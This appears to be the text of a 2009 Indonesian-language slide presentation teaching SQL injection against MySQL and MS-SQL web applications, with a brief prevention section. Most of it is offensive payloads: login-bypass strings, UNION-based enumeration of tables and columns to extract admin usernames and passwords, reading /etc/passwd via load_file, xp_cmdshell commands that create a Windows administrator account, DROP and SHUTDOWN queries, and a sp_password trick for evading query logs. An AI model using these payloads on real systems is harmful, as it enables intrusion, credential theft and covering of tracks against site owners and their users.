27 maret 2009 by : nazRuL [at] delaforta.net
Introduction SQL INJECTION SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
Simple Concept ‘ or 1=1-- ‘or ‘’ = ‘ ' or 1=1# ') or '1'='1-- admin'/* etc.....
MySQL Injection Input yang tak tervalidasi Penambahan tanda petik (‘) Pengujian dengan Query “AND”
INJECTION... CARI JUMLAH TABEL => ORDER BY CARI LETAK KOLOM => UNION SELECT CARI NAMA TABLE > information.schema > limit > group_concat
INJECTION (Continue...) * Let’s Get the XxX.. CARI NAMA KOLOM > information.schema > ‘table_name ‘ == hexa_string > limit > group_concat * Let’s Get the XxX..
THE SECRET DIBALIK table information .schema
Adavanced... * Magic Query .:. load_file(‘/path/file’); ex : /etc/passwd .:. into dumpfile (‘/path/fle’); Ex : /tmp/blabla > perm 777 /path/yang/diketahui/
MS-SQL Injection Input yang tak tervalidasi Penambahan tanda petik (‘) Pengujian dengan Query “AND”
INJECTION... Mencari nama-nama tabel => having 1=1-- (memanfaatkan error Query SQL) Memanfaatkan query “group by” => (group by table,table having 1=1--)
INJECTION... DATA MANIPULATION * UPDATE (update table_name set column2 where column1=n) * INSERT (insert into table_name values(n,’isi’) * DROP (drop table table_name) * SHUTDOWN
Adavanced... * Magic Query .:. Check status user convert(int,(select+user));-- .:. CMD SheLL queryf - * exec+master..xp_cmdshell ‘net user uname pass /add’ * exec+master..xp_cmdshell ‘net localgroup administartor uname /add’
Pencegahan - PHP based - ASP based Convert all to Int ‘Magic’ quotes Off <strip_tags> addslashes function - ASP based Replace ‘ to “ SQL Error Handling
Blind-SQL Injection Pengertian....
Blind-SQL => WHERE+table_name+NOT+IN+(‘table_yg_muncul’) # Pencarian table_admin, username ataupun passowrd # UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES => WHERE+table_name+NOT+IN+(‘table_yg_muncul’) UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=‘table_yg_diinginkan‘ => WHERE+table_name='user'+AND+ column_name+NOT+ IN+(‘column_yg_muncul’) UNION+SELECT+1,2,user,pass,4+FROM+table_admin
# Tips # Mengunakan Concatenation “untuk menampilkan field dengan banyak column_name” ID+’:’+username+’:’+userpass ( ID%2B':'%2Busername%2B':'%2Buserpass ) # Menggunakan --sp_password “sp_password berfungsi agar mssql tidak melakukan logs query pada mssql ( kemungkinan hanya terlog pada server) > sering di temui pada web aplication: asp,cfm,aspx, etc..